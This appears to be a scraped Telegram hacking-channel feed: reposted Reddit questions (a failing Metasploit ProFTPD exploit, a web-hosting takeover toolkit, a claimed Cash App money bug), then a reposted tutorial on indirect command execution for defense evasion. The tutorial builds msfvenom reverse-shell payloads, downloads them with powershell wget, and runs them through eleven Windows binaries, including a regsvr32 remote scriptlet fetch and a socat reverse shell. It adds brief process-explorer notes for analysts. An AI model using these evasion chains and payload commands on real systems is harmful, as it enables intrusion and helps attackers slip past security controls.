Hacking Articles Tips Tricks Videos Tutorials
470 subscribers
66.1K photos
15 videos
157 files
133K links
Exploit
Pentesting
Hacking
Red Team
Blue Team
Kali Linux
Bug Bounty
Black Hat
Cyber security etc

@Hacking_Video
@Hacking_attack
Download Telegram
hacking: security in practice
Exploit completed, but no session was created. - proftp_telnet_iac

Hello, i just setup a kali VM and ran metasploit on it, when trying to use the proftp_telnet_iac exploit it throws back (Censored RHOST):

Started reverse TCP handler on 0.0.0.0:4444

[*] - Automatically detecting the target...

[*] - FTP Banner: 220 ProFTPD 1.3.3a Server (Debian) [::ffff:10.126.75.4]

[*] - Selected Target: ProFTPD 1.3.3a Server (Debian) - Squeeze Beta1

[*] Exploit completed, but no session was created.

What should i do to make it work?, pretty sure it's something related to the LPORT or LHOST, I put my IP on LHOST, and left LPORT on default without setting up anything, can someone give me a helping hand?

submitted by /u/HackerArgento
[link] [comments]

___________________________
@hacking_Attack
@Hacking_Video
hacking: security in practice
Issues with pyinstaller/auto-py-to-exe

Issues converting py to exe using auto-py-to-exe

Anyone here know how to fix this? I see that it says “Failed to process hook entry point” maybe thats the issue? Idk.

Heres the error:

54517 ERROR: An error occurred while packaging Traceback (most recent call last): File "/usr/local/lib/python3.9/dist-packages/autopy_to_exe/packaging.py", line 131, in package run_pyinstaller() File "/usr/local/lib/python3.9/dist-packages/PyInstaller/main.py", line 124, in run run_build(pyi_config, spec_file, **vars(args)) File "/usr/local/lib/python3.9/dist-packages/PyInstaller/main.py", line 58, in run_build PyInstaller.building.build_main.main(pyi_config, spec_file, **kwargs) File "/usr/local/lib/python3.9/dist-packages/PyInstaller/building/build_main.py", line 803, in main build(specfile, distpath, workpath, clean_build) File "/usr/local/lib/python3.9/dist-packages/PyInstaller/building/build_main.py", line 725, in build exec(code, spec_namespace) File "/tmp/tmpyzydmpvu/hello.spec", line 7, in /u/NightComprehensive52
[link] [comments]

___________________________
@hacking_Attack
@Hacking_Video
hacking: security in practice
asking for a friend

Not sure if i’m in the right place for this, but can anybody here verify instagram/twitter accs?

submitted by /u/b3nf
[link] [comments]

___________________________
@hacking_Attack
@Hacking_Video
hacking: security in practice
Anonymous fox

Hey there. Does anyone have any experience with anonymous fox? For those of you unfamiliar it is a set of tools designed for web hosting take over. I know for certain that it works, however I didn’t install it because of all the shady practices and details that orbit its installation.

What I want to know is if anyone can vouch for it, and or have had experience / success using it and what your take is on it? Thank you

submitted by /u/605yeeter
[link] [comments]

___________________________
@hacking_Attack
@Hacking_Video
hacking: security in practice
Hackers of Reddit, what's one piece of advice you would give to make our internet lives more secure?

Advice could be anything Hardware or Software. From passwords to general security flaws one should avoid. Common scams, fishing attempts, common mistakes, and so on. Also, you can include any external websites you could think of to further assist your answer.

submitted by /u/Steelesticles
[link] [comments]

___________________________
@hacking_Attack
@Hacking_Video
hacking: security in practice
Do you think I will get compensated well over $8,000 for this vulnerability?

So I found a way to double your money and spend it with out actually deducting money from your account on the cashapp app for both android and ios.



I wont go into details but this would be my first vulnerability that I found that I think is a "severe" one since you can make money out of thin air.



idk how it works on the back end but I know it works. I also don't know if this is something I should report since idk if it has already been reported?

submitted by /u/yahboyelias
[link] [comments]

___________________________
@hacking_Attack
@Hacking_Video
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking Articles|Raj Chandel's Blog
Indirect Command Execution: Defense Evasion (T1202)

IntroductionIndirect Command Execution is a defense evasion technique that is often used by Red Teams in which an adversary tries to bypass certain defense filters put in place which may restrict certain types of scripts/executables from running. Various Windows utilities may be used to execute commands, possibly without invoking cmd. For example, if a firewall is restricting DLL execution, it can be bypassed using a procdump method or if there is a whitelist on certain executables containing pcalua.exe, it can be used to execute other executables. Some of these methods are discussed in this article.Table of content· Malicious EXE creation· Method 1 - forfiles.exe· Method 2 - pcalua.exe· Method 3 - procdump.exe (DLL method)· Method 4 - SyncAppvPublishingServer.vbs· Method 5 - wlrmdr.exe· Method 6 - explorer.exe· Method 7 - cmd.exe· Method 8 - ftp.exe· Method 9 - conhost.exe· Method 10 - WSL Only (bash.exe)· Method 11 - WSL Only (wsl.exe)· ConclusionFirst, we need to create an executable that will be executed. This is a simple simulation of what might happen in a real time Red Team scenario. We’ll use msfvenom to create a simple reverse shell. After that, we need to upload this exe into the victim machine using a python server.msfvenom -p windows/shell_reverse_tcp LHOST=192.168.0.89 LPORT=4444 -f exe > shell.exehttps://blogger.googleusercontent.com/img/a/AVvXsEj-wuREGwPxvcNPuPqJBQSjxC7mqPPUdZ2SZZfje33Cs8Z2wDXP1SNQbkWiXJny5VCM9GHzg5H1tSqY4X01wzn4B_siFHCn_Uc16ZI92hh4uAv5GGAX4PC1A45Ezc_U9iBT-i2NCN4YEKIQAdMnVyT2DsB7qZhVTEo0GaoZHPnSc34Vecgj3THrREEytA=s16000 Now, we can upload this executable to the already compromised victim device using powershell wgetpowershell wget 192.168.0.89/shell.exe -O C:\Users\Public\shell.exehttps://blogger.googleusercontent.com/img/a/AVvXsEj0qdPyyS3MywzDFfFtiSNsAdEK1KRIvU_itwrr7rBaJxq9Tc8HptN8XNGZnjfyn7SHcNf4L_MfRBbBgpVu-S7JJA9SwSAbzAItBFlBCI6ebzpywsJnZoJ5_WkJGxLO_MtTiVlnf6-NW6vFo-aHIK44lHqSkG4kYg-8ATKH_f2WTZ34OM5itsWNEww3lA=s16000 Now, the file is uploaded in the C:\Users\Publicdirectory for further use.Method 1 - forfilesAccording to Microsoft, “Selects and runs a command on a file or set of files. This command is most commonly used in batch files.” Here, /p specifies the path where forfiles will search for the search mask defined by /m flag (here, calc.exe). However, anything after the /c flag is the actual command. Hence, forfiles will now run our custom-made shell.forfiles /p c:\windows\system32 /m calc.exe /c C:\Users\Public\shell.exehttps://blogger.googleusercontent.com/img/a/AVvXsEiAQkSEph-Yc7qfWnPbuDvEXL2O5EWeynYdO3ByEBrDh2VzVAkpKiqsLALM3IdLE3cbZjYIacm8r5KivBkLkzFwX2PovXI1ssUoErvec6RhVjcBvNsmeiL2tOKn_8Knf6us7DQwkSfTKxynKkVqnkAKuDbN1noEKPPRKTehBSmFS0A3X8df9Oih3irzag=s16000 On our reverse listener set up on port 4444, we receive a connection as the shell gets executed!Inspection in process explorer: In the victim system, if an analyst checks process explorer, he shall see the following processes running that should make him suspicious. As you c[...]

___________________________
@hacking_Attack
@Hacking_Video
Hacking Articles Tips Tricks Videos Tutorials
Hacking Articles|Raj Chandel's Blog Indirect Command Execution: Defense Evasion (T1202) IntroductionIndirect Command Execution is a defense evasion technique that is often used by Red Teams in which an adversary tries to bypass certain defense filters put…
an see, forfiles.exe is running a suspicious file “shell.exe”Method 2 - pcalua.exeThe Program Compatibility Assistant is an automatic feature of Windows that runs when it detects an older program has a compatibility problem. Because of the utility of this executable, this is more often whitelisted in the systems. This can also run custom exe in compatibility mode. We can run our executable using the program with “-a” flag like:pcalua.exe -a C:\Users\Public\shell.exehttps://blogger.googleusercontent.com/img/a/AVvXsEi2uq-rNPAJI1FAjDYWp8n-ymHR3EtUbDZmYK07bnDsdVIcsoaoFwcs9Ju2fXIrsuG6uMQ7MrM8YoIRGdUUa8Tt-B-6JpiooWW1eE_eEgu6nsrU4N3VWaAUKMUcJSwhNziYoSfZ4xeS4Q7tlO25kUEcfG4VoEYjASE450YnMM3Tu8P94edsT8Lu5jNjIg=s16000 On our reverse listener set up on port 4444, we receive a connection as the shell gets executed!Inspection in process explorer: In the victim system, if an analyst checks process explorer, he shall see the following processes running that should make him suspicious. As you can see, shell.exe has spawned as a standalone process.Method 3 - procdump.exe (DLL method)ProcDump is a command-line utility whose primary purpose is monitoring an application for CPU spikes and generating crash dumps during a spike that an administrator or developer can use to determine the cause of the spike. This binary, developed by sysinternals team, can also be used to execute a DLL file by utilizing the 'MiniDumpCallbackRoutine' exported function. A valid ongoing process has to be provided as the memory dump of that process will be created while loading this DLL onto it.msfvenom -p windows/shell_reverse_tcp -f dll LHOST=192.168.0.89 LPORT=4444 > shell.dllhttps://blogger.googleusercontent.com/img/a/AVvXsEhYLRSUHzHTxEMpK2LIzGRWmD6UbwDEtDr_-FOxwBofbNV4C9ADkGqxO96zlw-a5wFg3qchVFqu1B2dhoEP02Mzhz4n-yZe1jgfQhQZkMAmy0dOHHNHwM6RQ7A6HaonIXuq7NNEOM47KGGqKA5dZiyO9XQyQdAUInuM5gXdZvfYdUzqSrjprivb4Dy2oA=s16000 Once, the DLL has been uploaded onto the victim system, using python server and powershell wget utility, procdump can be run with the “-md” optionC:\Sysinternals\procdump.exe -md shell.dll explorer.exehttps://blogger.googleusercontent.com/img/a/AVvXsEixa5wAW8UKBgZ2gamovgJFlUMAD9YAW1K6YRX0oKhB69vd9n_qo9hqJ6MvZ9z6yoYoxtFI8S8WjnhnZwgx2J97B6HgpbXioBs72hqUX4K0pX3lAMOKhhgbG_QRnXtmMkhnN4wR4pRv1ImstkPWD3W3b3urkf2Ez9wB094VQWjIZgbJGXnItKyfJ6UYCA=s16000 On our reverse listener set up on port 4444, we receive a connection as the shell gets executed!Inspection in process explorer: In the victim system, if an analyst checks process explorer, he shall see the following processes running that should make him suspicious. As you can see, our DLL has been executed using rundll as a child process of procdump.___________________________
@hacking_Attack
@Hacking_Video
Hacking Articles Tips Tricks Videos Tutorials
an see, forfiles.exe is running a suspicious file “shell.exe”Method 2 - pcalua.exeThe Program Compatibility Assistant is an automatic feature of Windows that runs when it detects an older program has a compatibility problem. Because of the utility of this…
L_hc7-1CHQ404D74LCutoYhe7GwGvmE_9ASKHjhcNS3ZEbzuQC20KgPbvcU00Gr7vb46oMQpb1m8ivIgmfxCn-sSMTL5luG1GsdSkIDrzgsWrgu-1xybOEH1wCVNsZNNhovGivuhG8claOn3RA=s16000 Method 4 - SyncAppvPublishingServer.vbsSyncAppvPublishingServer.vbs is a script available in newer versions on Windows 10 and 11 only. This is developed by Microsoft and can be used for MS Application Virtualization. It can also be indirectly used for executing EXE. This is achieved by .NET cmdlet known as “Start-Process”SyncAppvPublishingServer.vbs "n; Start-Process C:\Users\Public\shell.exe"https://blogger.googleusercontent.com/img/a/AVvXsEi51JoJQetwyc_mQt5oHfHeaLdXODKEBhwAzqEuPnL5RLdURtBBspCS68pMrxpf5MjPOGhfkptKIy6cz8ihry6a9hnMROJK5SEGvIz6Bmpkv4csZmpG8j_o2KYX-yAgbukHtBFV_xbuKaSLUIGphmba-zgbyNBjrDeocGNK8PmBplQv5wfIhgV3FPFW-A=s16000 On our reverse listener set up on port 4444, we receive a connection as the shell gets executed!Inspection in process explorer: In the victim system, if an analyst checks process explorer, he shall see the following processes running that should make him suspicious. As you can see, a conhost has been spawned inside a powershell process.use multi/script/web_delivery
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.0.89
set lport 1337
set target 3
runhttps://blogger.googleusercontent.com/img/a/AVvXsEi1xPz1hS2IxgvCBLTQ3ygUnFXIrcP0KhK2TuMuniUkcE0FZI3CfAj6tsQUKZ1uaTaQd4vHW_2bShfwrw_vLnbM0DIGOlhqHnJPWu8upLlts-f1AWYxBFjxar-ubp_ezlGCmKesJhAQbdh2f6M99MVqx66G9BCpCzt3O9qttCfaalQaRC4MV37ciQLBiQ=s16000 Now, we can inject this command into the SyncAppvPublishingServer.vbs script by giving a break clause and then the one liner.SyncAppvPublishingServer.vbs "Break; regsvr32 /s
/n /u /i:http://192.168.0.89:8080/qYRAgZv3qAaNC.sct scrobj.dll"https://blogger.googleusercontent.com/img/a/AVvXsEgqG1KsczzhWRW8x3HazANBsmyI_VHOk0J-uxm7YXNQu8lOwqe3LOZgIBC1WN7g5kmOABqU4aDbG74oP_xh9_J8GjrnZ1jdpIJ7m-a90JK2g69GSg5ZW1Gk1nQce_qaI1gGy6gDDJv0Kb_wVdGdDn1bPj3FkyAFsinLlhY3jIsTVIAz0evzjdSWhIbjXA=s16000 On our Metasploit console, we receive a reverse shell!Inspection in process explorer: In the victim system, if an analyst checks process explorer, he shall see the following processes running that should make him suspicious. As you can see, a conhost has been spawned inside a powershell process.Method 5 - wlrmdr.exeWindows Logon Reminder (wlrmdr.exe) is an executable file available by default in Microsoft which often throws up balloon reminders saying that Windows needs to lock and unlock the device in order to update windows login credentials. Here, this tool is taking bunch of flags for input.___________________________
@hacking_Attack
@Hacking_Video
Hacking Articles Tips Tricks Videos Tutorials
L_hc7-1CHQ404D74LCutoYhe7GwGvmE_9ASKHjhcNS3ZEbzuQC20KgPbvcU00Gr7vb46oMQpb1m8ivIgmfxCn-sSMTL5luG1GsdSkIDrzgsWrgu-1xybOEH1wCVNsZNNhovGivuhG8claOn3RA=s16000 Method 4 - SyncAppvPublishingServer.vbsSyncAppvPublishingServer.vbs is a script available in newer versions…
e following values that indicate an icon to display in the notification.wlrmdr.exe -s 3600 -f 0 -t _ -m _ -a 11 -u C:\Users\Public\shell.exehttps://blogger.googleusercontent.com/img/a/AVvXsEhDq7ZEecb6yay2IZxMuoFnPveACrfzURZCOepDSRKeitTM9CjN412UoMl9keL3oz3Rlz1SbLX1uPC0M9Akch6B50n5TvAZpLWqHERGZbpz6-JHP9NpX2Ts2NnQColfZnIOZEax6v8h6IjENeP-38qZ_y1soCHZeRIscQjzwsvYhGel_1lV4uwGta1VPQ=s16000 On our reverse listener set up on port 4444, we receive a connection as the shell gets executed!Inspection in process explorer: In the victim system, if an analyst checks process explorer, he shall see the following processes running that should make him suspicious. As you can see, shell.exe as a standalone has been spawned.Method 6 - explorer.exeExplorer.exe is the executable run when a user opens file manager. The path bar where current working directory is mentioned also serves as a run prompt kind of a thing where if you input name of a binary it spawns (like cmd.exe). Moreover, the binary is spawned as a child process of explorer.exe. This can be achieved via command line too.explorer.exe /root,"C:\Users\Public\shell.exe"https://blogger.googleusercontent.com/img/a/AVvXsEiFFhILJJ_58lfvZjDYd0KdOnRaGtKPj0YBmV9aEgR-zE3ZOFysO-OzBjF2XgRvigahG5IbVC1wgY5SVkvQUuFoGmXBXTo5mtiHa6Q94Rsla8zqAGXb3Yn8KIM_ZZ3wdkLclvpQlFVxDPRMU1Vfk9tHE3PY5aamA7iV3-0lbXV-mJPhAJzYqp-tw-KsEA=s16000 On our reverse listener set up on port 4444, we receive a connection as the shell gets executed!Inspection in process explorer: In the victim system, if an analyst checks process explorer, he shall see the following processes running that should make him suspicious. As you can see, cmd.exe has been spawned which in turn runs our shell.exeMethod 7 - cmd.exeCmd.exe is the command prompt (terminal) of Windows and capable of executing binaries using the /c flag. One can indirectly execute a malicious file using cmd.exe like so:cmd.exe /c C:\Users\Public\shell.exeMoreover, an attacker may also benefit from the lesser-known path traversal execution method. This lets an attacker traverse back to explorer.exe and use that to initiate process for “shell.exe.” This complicates the analysis part for a blue teamer and is considered better than the previous method.cmd.exe /c "ignite.local /../../../../../../../../../../windows/explorer.exe" /root,C:\Users\Public\shell.exehttps://blogger.googleusercontent.com/img/a/AVvXsEgqmG7357TPZiflCYNmR-zAn6A1_Fy8G6sZgPFJRQQ0gcxsS1YeyObFwBuPShBGCSLAXNkwb-niUD8FAGLb_Nh3kYO1BAnjHEBMhg_6xjpt_RG02tUr12Dl0AZyB_0a6OIeGmsgHDFVUVZaOljSQrPkueoHUPc82-EiU5qaSLEMrZdYkbDlNLHZKw_-JA=s16000 On our reverse listener [...]

___________________________
@hacking_Attack
@Hacking_Video
Hacking Articles Tips Tricks Videos Tutorials
e following values that indicate an icon to display in the notification.wlrmdr.exe -s 3600 -f 0 -t _ -m _ -a 11 -u C:\Users\Public\shell.exehttps://blogger.googleusercontent.com/img/a/AVvXsEhDq7ZEecb6yay2IZxMuoFnPveACrfzURZCOepDSRKeitTM9CjN412UoMl9keL3oz3…
set up on port 4444, we receive a connection as the shell gets executed!Inspection in process explorer: In the victim system, if an analyst checks process explorer, he shall see the following processes running that should make him suspicious. As you can see, a conhost (masking our shell) has been spawned as a child process under explorer.exe process and is stealthier.Method 8 - ftp.exeNewer versions of Windows 10 and 11 come with an ftp.exe binary already included with the default installation. Moreover, it is available in the system PATH variable and can be executed from any working directory. Thereafter, we can load the command we want to run in a text file called “script.txt” and execute it using ftp -s option which executes text files as script. Hence, we include the explorer.exe command in this script and execute it using ftp.echo !explorer.exe /root,"C:\Users\Public\shell.exe" > script.txt && ftp -s:script.txthttps://blogger.googleusercontent.com/img/a/AVvXsEiPtvd4JhzWG5hmreHbVQzsP1qwQrYKijhJNHpHlrq7eE0OVHw1d0T4qbngV4qNN0s2T6Vp07JiFtcJkKBKjhYVVxI87UqN6SkXXCdkNXp79C582BQ0oKoCoX8r3pxgr1XkK1ypeQeJM1eVg_AwFlIf3Ocmesg_mmjHVbHtcK58AMflqyMHXjGcoAIlqg=s16000 On our reverse listener set up on port 4444, we receive a connection as the shell gets executed!Inspection in process explorer: In the victim system, if an analyst checks process explorer, he shall see the following processes running that should make him suspicious. As you can see, an ftp instance is running with no notable indication of our shell.exe in processes making it stealthier.Method 9 - conhost.exeConhost.exe stands for Console Host which was introduced with Windows 7. It is sort of a bridge between old school CRSS and cmd.exe. More information can be found here. In simpler terms it helps Command Prompt to interact with Windows explorer and provides functionality like drag and drop text from explorer to cmd.exe.conhost "ignite.local C:\Users\Public\shell.exe"https://blogger.googleusercontent.com/img/a/AVvXsEjZZHpX82jke6s87hFOap2lQIqioMPgruyVXVcMW675bELlUzizx8J-3iwQkKGM5tq_JAasQQudoUjqob4gsiDF3L8_b4APEJaK4JKUyKBJtvy7Kp66yJVs6xuR6gLBtOz09NbkoB1qQ_219pT7LoGLsB5vLGxiIkdIXg19hGOiVhVZNBgvJoh_KC_emQ=s16000 On our reverse listener set up on port 4444, we receive a connection as the shell gets executed!Inspection in process explorer: In the victim system, if an analyst checks process explorer, he shall see the following processes running that sh[...]

___________________________
@hacking_Attack
@Hacking_Video
Hacking Articles Tips Tricks Videos Tutorials
set up on port 4444, we receive a connection as the shell gets executed!Inspection in process explorer: In the victim system, if an analyst checks process explorer, he shall see the following processes running that should make him suspicious. As you can see…
ould make him suspicious. As you can see, a conhost instance has been launched within a cmd.exe process. It is stealthy as compared to other methods as shell.exe isn’t seen in the process explorer.Method 10 - WSL Only (bash.exe)The next two methods are use-case specific. WSL stands for Windows Subsystem for Linux and can help a user install an instance of their favourite Linux distro onto Windows itself by creating a subsystem. Here, the victim has installed an Ubuntu instance in WSL. It can be installed by instructions provided here. bash.exe -c "socat tcp-connect:192.168.0.89:4444 exec:sh,pty,stderr,setsid,sigint,sane"https://blogger.googleusercontent.com/img/a/AVvXsEjlMqohYTCrWXdeE1EMDrJ1_TWQue_NK4InmPw6KRGLtY3_b-AaWZBkvtuM6wym4XFN_jE9HwdVYw79JNFW1Ss-9Su37do4nyhF6rNLhSdtDV_4T6o-qu3uZ_tc9-KdFHQsLdzVbUsbgrj-wKzz9q23GD3zK7_paGAHXWyGHvkGeJ0olVrwci-W4Mt0iA=s16000 On our reverse listener set up on port 4444, we receive a connection as the shell gets executed!Inspection in process explorer: In the victim system, if an analyst checks process explorer, he shall see the following processes running that should make him suspicious. As you can see, wsl.exe process has been launched under which conhost is initiated along with a socat and bash process. It is stealthy.Method 11 - WSL Only (wsl.exe)Socat instance on a WSL is plausible but not necessary. However, an executable called wsl.exe is present by default in Windows system where WSL is installed. This exe can be used to launch the exe present in WSL. This way, the shell will be launched indirectly.wsl.exe -e /mnt/c/Users/Public/shell.exehttps://blogger.googleusercontent.com/img/a/AVvXsEjx-BRKTlxOyVryZf57AMZchGXcj8MIPICRgIjiT0Wrob-TVJHe2wqbMuHI4v4LvsQ6OVKHP50p7vkBKzjFJAgDCG-RTL4XsQgYLUnAt0OrR8rF6OfqZ61F1zmmgc9oCxWXcRZDpQLlRHzZOyl5uJv5qdNtGYyAkemBjiO8F79cqPLoCsQRSCGEWjOkjw=s16000 On our reverse listener set up on port 4444, we receive a connection as the shell gets executed!Inspection in process explorer: In the victim system, if an analyst checks process explorer, he shall see the following processes running that should make him suspicious. As you can see, wsl.exe process has been launched under which conhost is initiated along with a shell.exe process. It is not as stealthy as other methods.___________________________
@hacking_Attack
@Hacking_Video